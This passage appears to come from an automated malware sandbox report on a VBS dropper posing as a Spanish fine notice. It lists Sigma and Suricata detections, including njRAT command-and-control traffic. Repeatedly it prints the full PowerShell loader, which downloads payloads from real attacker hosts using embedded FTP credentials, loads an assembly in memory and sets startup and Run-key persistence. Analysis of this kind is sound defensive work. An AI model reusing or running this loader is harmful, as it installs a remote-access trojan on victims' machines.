'1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -comman

Sigma detected: Suspicious Powershell In Registry Run Keys

Source: Registry Key set

Author: frack113, Florian Roth (Nextron Systems): Data: Details: cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5436, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_nyj

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -comman

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs", CommandLine|base64offset|contains: b~'r*', Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs", ProcessId: 4956, ProcessName: wscript.exe

Sigma detected: Local Accounts Discovery

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: cmd.exe /c mkdir "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\", CommandLine: cmd.exe /c mkdir "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1088, ParentProcessName: powershell.exe, ProcessCommandLine: cmd.exe /c mkdir "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\", ProcessId: 4836, ProcessName: cmd.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9???Ds???KQ???g???Ck???I??????n???GU???dQBy???HQ???Jw???g???Cw???I???BY???F??????VQB1???Gg???J??????g???Cw???I??????n???Gg???d???B0???H??????cw???6???C8???LwBm???Gk???cgBl???GI???YQBz???GU???cwB0???G8???cgBh???Gc???ZQ???u???Gc???bwBv???Gc???b???Bl???GE???c???Bp???HM???LgBj???G8???bQ???v???HY???M??????v???GI???LwBk???GU???cwBj???GE???cgBn???GE???cw???t???GQ???Yw???0???GQ???Ng???u???GE???c???Bw???HM???c???Bv???HQ???LgBj???G8???bQ???v???G8???LwBl???G4???dgBp???G8???cw???t???G4???dQBl???HY???bwBz???C4???d???B4???HQ???PwBh???Gw???d??????9???G0???ZQBk???Gk???YQ???m???HQ???bwBr???GU???bg???9???GM???ZQ???2???Dk???M???Bh???DY???M??????t???Dc???O???Bl???GI???LQ???0???D??????MQBi???C0???YgBm???GM???Ng???t???DE???Z???Bj???Dg???Mg???1???GU???MQ???5???DQ???Yg???y???Cc???I??????o???C??????XQBd???Fs???d???Bj???GU???agBi???G8???Ww???g???Cw???I???Bs???Gw???dQBu???CQ???I??????o???GU???awBv???HY???bgBJ???C4???KQ???g???Cc???SQBW???EY???cgBw???Cc???I??????o???GQ???bwBo???HQ???ZQBN???HQ???ZQBH???C4???KQ???n???DE???cwBz???GE???b???BD???C4???MwB5???HI???YQBy???GI???aQBM???HM???cwBh???Gw???Qw???n???Cg???ZQBw???Hk???V???B0???GU???Rw???u???Ck???I???Ba???GM???QgBj???GE???J??????g???Cg???Z???Bh???G8???T??????u???G4???aQBh???G0???bwBE???HQ???bgBl???HI???cgB1???EM???Og???6???F0???bgBp???GE???bQBv???EQ???c???Bw???EE???LgBt???GU???d???Bz???Hk???UwBb???Ds???KQ???g???Ck???I??????n???EE???Jw???g???Cw???I??????n???JMhOgCTISc???I??????o???GU???YwBh???Gw???c???Bl???FI???LgBn???FM???egBD???EI???b??????k???C??????K???Bn???G4???aQBy???HQ???Uw???0???DY???ZQBz???GE???QgBt???G8???cgBG???Do???OgBd???HQ???cgBl???HY???bgBv???EM???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Fo???YwBC???GM???YQ???k???C??????XQBd???Fs???ZQB0???Hk???QgBb???Ds???Jw???l???Ek???a???Bx???FI???W??????l???Cc???I??????9???C??????W???BQ???FU???dQBo???CQ???Ow???p???C??????ZwBT???Ho???QwBC???Gw???J??????g???Cg???ZwBu???Gk???cgB0???FM???Z???Bh???G8???b???Bu???Hc???bwBE???C4???egB0???Hg???a??????k???C??????PQ???g???Gc???UwB6???EM???QgBs???CQ???Ow???4???EY???V???BV???Do???OgBd???Gc???bgBp???GQ???bwBj???G4???RQ???u???HQ???e???Bl???FQ???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Gc???bgBp???GQ???bwBj???G4???RQ???u???Ho???d???B4???Gg???J??????7???Ck???d???Bu???GU???aQBs???EM???YgBl???Fc???LgB0???GU???Tg???g???HQ???YwBl???Go???YgBP???C0???dwBl???E4???K??????g???D0???I???B6???HQ???e???Bo???CQ???Ow???p???Cg???ZQBz???G8???c???Bz???Gk???Z??????u???Ho???d???B4???Gg???J??????7???Ck???I??????n???HQ???e???B0???C4???MQ???w???Ew???T???BE???C8???MQ???w???C8???cgBl???HQ???c???B5???HI???YwBw???FU???LwBy???GI???LgBt???G8???Yw???u???HQ???YQBy???GI???dgBr???GM???cwBl???GQ???LgBw???HQ???ZgB??????DE???d???Bh???HI???YgB2???Gs???YwBz???GU???Z??????v???C8???OgBw???HQ???Zg???n???C??????K???Bn???G4???aQBy???HQ???UwBk???GE???bwBs???G4???dwBv???EQ???LgB6???HQ???e???Bo???CQ???I??????9???C??????ZwBT???Ho???QwBC???Gw???J??????7???Ck???JwB??????E??????c

Sigma detected: Potential Encoded PowerShell Patterns In CommandLine

Source: Process started

Sigma detected: PowerShell Script Dropped Via PowerShell.EXE

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1088, TargetFilename: C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1

Persistence and Installation Behavior

Sigma detected: Copy file to startup via Powershell

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -comman

Suricata Signatures

ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-24T23:42:24.538051+0200	2033132	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-24T23:42:10.278503+0200	2803305	3	Unknown Traffic	192.168.2.5	49708	76.76.21.22	443	TCP
2024-09-24T23:42:13.919461+0200	2803305	3	Unknown Traffic	192.168.2.5	49711	76.76.21.22	443	TCP

ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (CAP)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-24T23:43:16.816363+0200	2825566	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP

ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-24T23:42:30.780426+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:20.415585+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:21.823270+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:26.275661+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:26.448004+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:27.447593+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:27.572536+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:27.874346+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:27.879287+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:27.884284+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:27.890574+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:27.895424+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:27.900265+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:27.905133+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:27.909984+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:27.917729+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:27.922522+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:27.938041+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.006779+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.078828+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.083729+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.089272+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.094773+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.102648+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.107699+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.112675+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.118220+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.125430+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.130615+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.135572+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.141947+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.146951+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.151855+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.156685+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.162693+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.167715+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.189826+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.194891+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.199734+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.204631+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.209478+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.215309+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.220171+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.225084+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.232142+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.237093+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.242013+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.246929+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.251785+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.260716+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.265623+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.270502+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.281059+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.320454+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.325448+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.330529+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.336799+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.344731+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.350336+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.356134+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.362179+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.368022+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.393404+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.399029+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.404239+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.410456+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.415443+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.420374+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.426867+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.431776+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.436637+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.443695+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.448627+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.453477+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.458417+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.463317+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.468119+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.473049+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.477902+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.482840+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.487734+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.493974+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.498863+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.503742+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.510071+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.517350+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.522195+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
